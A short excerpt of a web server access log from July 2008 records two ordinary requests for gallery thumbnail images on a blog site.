74.10.5.213 - - [14/Jul/2008:10:26:03 -0700] "GET /blog/wp-content/gallery/crestoc-2008/thumbs/thumbs_img_0017.jpg HTTP/1.1" 200 9762 "http://www.dmulk.com/?show=gallery&pageid=17" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "dmulk.com"
74.10.5.213 - - [14/Jul/2008:10:26:03 -0700] "GET /blog/wp-content/gallery/crestoc-2008/thumbs/thumbs_img_0018.jpg HTTP/1.1" 200 8659 "http://www.dmulk.com/?show=gallery&pageid=17" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "dmulk.com"
